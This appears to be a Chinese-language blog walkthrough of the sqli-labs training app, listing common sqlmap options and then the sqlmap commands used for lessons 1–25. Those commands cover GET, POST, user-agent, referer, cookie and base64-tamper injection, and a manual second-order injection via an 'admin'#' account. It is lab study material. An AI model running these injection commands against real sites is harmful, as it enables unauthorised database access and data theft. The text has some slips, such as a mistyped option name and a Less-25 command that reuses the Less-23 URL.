下面是sqlmap的一些常用参数。
sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-1/?id=2" 整体语句
--batch 不需要手动输入YES or NO
--current-db 查看当前使用数据库
-dbs 观察所有数据库
--current-user 查看当前使用数据库用户
--tables 查看表
--columns查看列
--level 5 sqlmap一共有5个测试等级1~5,不加等级参数默认是1。
--is-dba 返回true为管理员权限
--roles 查看数据库角色,--u 可以指定用户
-–referer 请求伪造referer头,当设置level为3、或以上则会对referer进行注入。
--user-angent 对user-angent字段进行注入
--cookie 指定cookie字段注入
-p 指定注入位置,如-p id 对id字段进行注入,选定多个注入点使用","分割。
--dump 得到结果展示
--thread 1-10 指定进程数
--tamper 引入插件 这里可以百度下载具体脚本,在这里引入即可,如解码、双写、大小写等
现在开始实验
Less-1
http://192.168.26.1/sqli-labs-master/Less-1/?id=2
Less-2
http://192.168.26.1/sqli-labs-master/Less-2/?id=2
sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-2/?id=2" --batch
后续和Less-1类似
运行存在延迟注入点。
Less-3
http://192.168.26.1/sqli-labs-master/Less-3/?id=2
sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-3/?id=2" --batch --dbs
Less-4
http://192.168.26.1/sqli-labs-master/Less-4/?id=2
sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-4/?id=2" --batch --dbs
Less-5 (无回显)
http://192.168.26.1/sqli-labs-master/Less-5/?id=3
sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-5/?id=2" --batch --dbs
Less-6(无回显)
http://192.168.26.1/sqli-labs-master/Less-6/?id=1
sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-6/?id=2" --batch --dbs
Less-7(无回显)
http://192.168.26.1/sqli-labs-master/Less-7/?id=3
sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-7/?id=2" --batch --dbs
Less-8(时间盲注)
http://192.168.26.1/sqli-labs-master/Less-8/?id=2
sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-8/?id=2" --batch --dbs
Less-9
http://192.168.26.1/sqli-labs-master/Less-9/?id=2
sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-9/?id=2" --batch --dbs
Less-10
http://192.168.26.1/sqli-labs-master/Less-10/?id=2
使用sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-10/?id=2" --batch --dbs 发现GET ID字段不存在注入点。
提示使用高等级注入
sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-10/?id=2" --batch --level 2
Less-11
http://192.168.26.1/sqli-labs-master/Less-11/?id=2
less11变成了post数据,使用–data命令指定payload进行注入,–data “uname=1&passwd=11&submit=Submit” ,其实这里指定payload相当于说明对此post区域进行注入。
sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-11/?id=2" --batch --data “uname=admin&passwd=admin&submit=Submit” --dbs
成功执行输出。
Less-12
http://192.168.26.1/sqli-labs-master/Less-12/?id=2
sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-12/?id=2" --batch --data “uname=admin&passwd=admin&submit=Submit” --dbs
Less-13
http://192.168.26.1/sqli-labs-master/Less-13/?id=2
sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-13/?id=2" --batch --data “uname=admin&passwd=admin&submit=Submit” --dbs
Less-14
http://192.168.26.1/sqli-labs-master/Less-14/?id=2
sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-14/?id=2" --batch --data “uname=admin&passwd=admin&submit=Submit” --dbs
Less-15
http://192.168.26.1/sqli-labs-master/Less-15/?id=2
sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-15/?id=2" --batch --data “uname=admin&passwd=admin&submit=Submit” --dbs
延迟注入时间太久,爆出来两个表看到效果即可。
Less-16
http://192.168.26.1/sqli-labs-master/Less-16/?id=2
sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-16/?id=2" --batch --data “uname=admin&passwd=admin&submit=Submit” --dbs --level 2
Less-17
http://192.168.26.1/sqli-labs-master/Less-17/?id=2
sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-17/?id=2" --batch --data “uname=admin&passwd=admin&submit=Submit” --dbs --level 2
Less-18
http://192.168.26.1/sqli-labs-master/Less-18/?id=2
用注入命令发现都不行,这里引入agent注入。
–user-agent=“" --thread=10 通过指定–user-agent参数对user-agent参数进行检查注入点。 --thread设置线程数 1-10 。
sqlmap -u “http://192.168.26.1/sqli-labs-master/Less-18/?id=1" --batch --dbs --user-agent=”” --data “uname=admin&passwd=admin&submit=Submit” --thread 10
Less-19
http://192.168.26.1/sqli-labs-master/Less-19/
观察源码,有referer可以进行注入。
–referer=“*”
sqlmap -u “http://192.168.26.1/sqli-labs-master/Less-19/?id=1" --batch --dbs --referer=”*" --data “uname=admin&passwd=admin&submit=Submit” --thread 10
Less-20
http://192.168.26.1/sqli-labs-master/Less-20/index.php
–cookie “uname=XXX” 引入cookie注入
sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-20/?id=1" --batch --dbs --cookie=“uname=admin and expires: Fri 18 Nov 2022 - 18:43:19” --thread 10 -level 2
Less-21
http://192.168.26.1/sqli-labs-master/Less-21/index.php
对输入字符进行base64编码,sqlmap对cookie字段进行base64注入
–tamper “base64encode.py” --tamper是引入插件,其中sqlmap中存在很多插件,如编码解码、绕过空格等
sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-21/?id=1" --batch --dbs --cookie=“uname=admin and expires: Fri 18 Nov 2022 - 18:43:19” --tamper “base64encode.py” --thread 10 -level 2
Less-22
http://192.168.26.1/sqli-labs-master/Less-22/index.php
和Less-21雷同
Less-23
http://192.168.26.1/sqli-labs-master/Less-23/index.php?id=1
sqlmap -u http://192.168.26.1/sqli-labs-master/Less-23/index.php?id=1 --batch --dbs
Less-24(二次注入)
注册–》登录–》更改密码
步骤如下:
注册admin’# 账号
登录admin‘#账号
登录后提示修改密码,这里修改admin账号密码。
修改成功,使用admin账号登录
Less-25
http://192.168.26.1/sqli-labs-master/Less-25/?id=1
sqlmap -u http://192.168.26.1/sqli-labs-master/Less-23/index.php?id=1 --batch --dbs